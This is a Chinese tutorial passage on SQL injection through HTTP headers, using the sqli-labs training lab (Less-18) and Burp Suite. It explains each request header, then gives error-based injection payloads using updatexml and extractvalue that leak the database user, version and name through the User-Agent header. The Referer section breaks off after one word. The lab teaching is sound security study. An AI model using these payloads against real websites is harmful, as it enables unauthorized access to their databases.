sql注入——HTTP头部注入

HTTP请求头内容

POST（请求方式） /sqli-labs/Less-18/（请求目标资源） HTTP/1.1 （协议版本）
Host: 192.168.0.63（目标主机）
User-Agent: Mozilla/5.0 (X11; Linux x86_ 64; rv: 73.0) Gecko/20100101 Firefox/73.0 （客户端浏览器版本）
Accept: text/html, application/ xhtml+xml, application/ xml ; q=0.9, image/webp. /;q=0. 8 (客户端能接受资源的类型)
Accept-Language: zh-CN,zh;q=0.8, zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 (客户端接收的语言类型)
Accept- Encoding: gzip, deflate (客户端能接收的压缩数据的类型)
Content -Type : application/x -Www form-urlencoded
Content-Length: 38
0rigin: http://192.168.0.63
Connection: close
Referer: http://192. 168.0.63/sqli-labs/Less-18/
Upgrade- Insecure-Requests: 1

---

HTTP头注入

原理：

HTTP头中的参数带入到数据库被执行，造成了HTTP头注入。

http注入里用到的函数
MySQL 5.1.5 版本中添加了对 XML 文档迚行查询和修改的凼数

extractvalue(XML_document, XPath_string); #查询
updatexml(XML_document, XPath_string, new_value); #修改

凼数说明：
XPath_string 字段表示该字段必须满足 XPath_string 格式否则报错。因此第二个参数是我们关注的重点，其他参数对于注入来说都是无关紧要的，用占位符代替就可以了。

一、HTTP user-agent 注入

实验环境
sqli-labs/less-18、burpsuite

开始实验
1.进入测试环境登录，并用bp拦截

2.对http user-agent进行错误注入测试


可见是可以进行错误注入的，爆出一些信息。

3.爆信息
利用updatexml（）函数爆信息

代码：

' and updatexml(null,concat(user(),0x3a,version()),null) or '1' = ' 1

这样就爆出了相应信息。

' and 用来拼接我们的 SQL 语句。
updatexml 的第一个和第三个null是占位符。第二个位置可用来爆信息。
or '1'='1（注意这里要少一个单引号，因为语句最后还有一个自动闭合的单引号）闭合最后的单引号否则整条语句报错违接查询不会被执行。
extractvalue 用法

' or extractvalue(1,concat(0x7e,database())) or '1'='1

使用方法和update（）基本一致。

二、HTTP referer 注入

sqli-labs/less-19

盲注